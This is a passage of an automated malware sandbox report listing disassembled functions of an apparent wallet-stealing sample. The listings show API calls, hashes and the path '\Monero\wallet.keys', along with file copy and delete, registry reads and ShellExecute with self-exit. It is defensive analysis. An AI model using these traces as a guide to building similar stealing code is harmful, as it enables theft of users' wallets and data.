                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 92dd7390578d2081df347c8cd6f7d72ffafa7631cee8f49f85546ef17603349a
                        • Instruction ID: 815b8c06b774bb8a32f1fbf544e440726339ae325fe790860809d99c9d3050bf
                        • Opcode Fuzzy Hash: 92dd7390578d2081df347c8cd6f7d72ffafa7631cee8f49f85546ef17603349a
                        • Instruction Fuzzy Hash: 7711A0B1A54205EBD700DF94DD4AFBBBBB8FB09B00F108129F605A7280D7B85814CBA1
                        Function 00279260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                        Download Yara Rule
                        APIs
                        • StrStrA.SHLWAPI(00E2E0D0,?,?,?,0027140C,?,00E2E0D0,00000000), ref: 0027926C
                        • lstrcpyn.KERNEL32(004AAB88,00E2E0D0,00E2E0D0,?,0027140C,?,00E2E0D0), ref: 00279290
                        • lstrlen.KERNEL32(?,?,0027140C,?,00E2E0D0), ref: 002792A7
                        • wsprintfA.USER32 ref: 002792C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpynlstrlenwsprintf
                        • String ID: %s%s
                        • API String ID: 1206339513-3252725368
                        • Opcode ID: 1d64c54dc8a952b47b2f5a4c146ac16c13673a7f089f011cf467badc1d4ca19a
                        • Instruction ID: a02144a7e15050e1bcab0f925863a307fd0fe93bc44385dec298faa1962749ad
                        • Opcode Fuzzy Hash: 1d64c54dc8a952b47b2f5a4c146ac16c13673a7f089f011cf467badc1d4ca19a
                        • Instruction Fuzzy Hash: F7011E75500208FFCB04DFECC988EAE7BB9EB49350F108158F9098B241C735EA60DBA6
                        Function 002612A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002612B4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 002612BB
                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 002612D7
                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 002612F5
                        • RegCloseKey.ADVAPI32(?), ref: 002612FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: ea0fbd993a1c1a97eb09f435aeed9098f9eeaed4ea9253057e9e0ebccb5d5a6e
                        • Instruction ID: 0d33b03d6892bcfe80ea674d4d1ee9cf34d203b4667db3ed80c467d9e6c61ba9
                        • Opcode Fuzzy Hash: ea0fbd993a1c1a97eb09f435aeed9098f9eeaed4ea9253057e9e0ebccb5d5a6e
                        • Instruction Fuzzy Hash: 940131B9A40208BFDB00DFE0DC49FAEBBB8EB48701F008169FA0597280D774AA15CF55
                        Function 00276630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00276663
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00276726
                        • ExitProcess.KERNEL32 ref: 00276755
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                        • String ID: <
                        • API String ID: 1148417306-4251816714
                        • Opcode ID: bd31e9cb5eaacc299da4628412f17ba2d340044f81cf33086f7748adde32a3b3
                        • Instruction ID: 7d9671753bf490e4e1f9970a40062694224fa6c2cfe2612e6dfce4078965d729
                        • Opcode Fuzzy Hash: bd31e9cb5eaacc299da4628412f17ba2d340044f81cf33086f7748adde32a3b3
                        • Instruction Fuzzy Hash: 773161B1C11208ABDB54EB50DC86FDEBB78AF44310F408198F31A66191DF746B58CF5A
                        Function 002787C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00280E28,00000000,?), ref: 0027882F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00278836
                        • wsprintfA.USER32 ref: 00278850
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: 51466b41cd0728ccaefdf8393b9d8b4124eba6ea2569f9f800579194a01dbde7
                        • Instruction ID: b94dc168dc1cae08886696b77e1bc50dea399ddd55d5ccdb1deb26e26993ad90
                        • Opcode Fuzzy Hash: 51466b41cd0728ccaefdf8393b9d8b4124eba6ea2569f9f800579194a01dbde7
                        • Instruction Fuzzy Hash: 6A214FB1A50208AFDB04DF94DD49FAEBBB8FB49B11F10412DF605A7280C779A910CFA5
                        Function 00278D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0027951E,00000000), ref: 00278D5B
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00278D62
                        • wsprintfW.USER32 ref: 00278D78
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesswsprintf
                        • String ID: %hs
                        • API String ID: 769748085-2783943728
                        • Opcode ID: 0a6efadf6e19f404bb3b641dfdfa5ba23613286e1ba70ad8bcba24e66d48cb74
                        • Instruction ID: dc3c956aaaecf7568d88790bcbc7274d7de520ce579c17a98a34e0fa6236bfc2
                        • Opcode Fuzzy Hash: 0a6efadf6e19f404bb3b641dfdfa5ba23613286e1ba70ad8bcba24e66d48cb74
                        • Instruction Fuzzy Hash: A5E08674A40208BFC700EF94DC09E597BB8EB05701F000068FD0987280DA759E24CB56
                        Function 0026A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                          • Part of subcall function 00278B60: GetSystemTime.KERNEL32(00280E1A,00E2A610,002805AE,?,?,002613F9,?,0000001A,00280E1A,00000000,?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 00278B86
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0026A2E1
                        • lstrlen.KERNEL32(00000000,00000000), ref: 0026A3FF
                        • lstrlen.KERNEL32(00000000), ref: 0026A6BC
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                        • DeleteFileA.KERNEL32(00000000), ref: 0026A743
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 5269517442a32bf34dd9967ae16516797106f139d79fdbea743ab51bd8d45226
                        • Instruction ID: 56102a0c53bc9d7d0f9375b321625178181fa013447c6ce22106bac5c71aaede
                        • Opcode Fuzzy Hash: 5269517442a32bf34dd9967ae16516797106f139d79fdbea743ab51bd8d45226
                        • Instruction Fuzzy Hash: DCE1CF728201189ADB05FBA4DC92EEE733CAF94310F50C169F51B76091EF346A69CF66
                        Function 0026D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                          • Part of subcall function 00278B60: GetSystemTime.KERNEL32(00280E1A,00E2A610,002805AE,?,?,002613F9,?,0000001A,00280E1A,00000000,?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 00278B86
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0026D481
                        • lstrlen.KERNEL32(00000000), ref: 0026D698
                        • lstrlen.KERNEL32(00000000), ref: 0026D6AC
                        • DeleteFileA.KERNEL32(00000000), ref: 0026D72B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: f25ef18cf311b725eee6334964ca30e7236c8728d15c3b8e807989cd843b2046
                        • Instruction ID: 6b22fdc6101993b8f8c894dc39e1b60354e547ff1b9aa2a0a24f76dd3dc69162
                        • Opcode Fuzzy Hash: f25ef18cf311b725eee6334964ca30e7236c8728d15c3b8e807989cd843b2046
                        • Instruction Fuzzy Hash: 1C91E3729201089BDB04FBA4DC96DEE7338AF94310F50C169F51BA6091EF346A69CF67
                        Function 0026D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                          • Part of subcall function 00278B60: GetSystemTime.KERNEL32(00280E1A,00E2A610,002805AE,?,?,002613F9,?,0000001A,00280E1A,00000000,?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 00278B86
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0026D801
                        • lstrlen.KERNEL32(00000000), ref: 0026D99F
                        • lstrlen.KERNEL32(00000000), ref: 0026D9B3
                        • DeleteFileA.KERNEL32(00000000), ref: 0026DA32
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 7e36287ee9e11dc52c42ee502d7507bd13b129ce7611c43a2a32971683a41689
                        • Instruction ID: 8f0b3d8fc0ec6658184eace0f1f769d8f5ebe1348cc0ec4b06e0e179fbb08a10
                        • Opcode Fuzzy Hash: 7e36287ee9e11dc52c42ee502d7507bd13b129ce7611c43a2a32971683a41689
                        • Instruction Fuzzy Hash: 0081E0729201089ADB04FBA4DC96DEE7738AF94310F508529F51BA6091EF346A29CF67
                        Function 0026F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                          • Part of subcall function 002699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002699EC
                          • Part of subcall function 002699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00269A11
                          • Part of subcall function 002699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00269A31
                          • Part of subcall function 002699C0: ReadFile.KERNEL32(000000FF,?,00000000,0026148F,00000000), ref: 00269A5A
                          • Part of subcall function 002699C0: LocalFree.KERNEL32(0026148F), ref: 00269A90
                          • Part of subcall function 002699C0: CloseHandle.KERNEL32(000000FF), ref: 00269A9A
                          • Part of subcall function 00278E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00278E52
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00281580,00280D92), ref: 0026F54C
                        • lstrlen.KERNEL32(00000000), ref: 0026F56B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
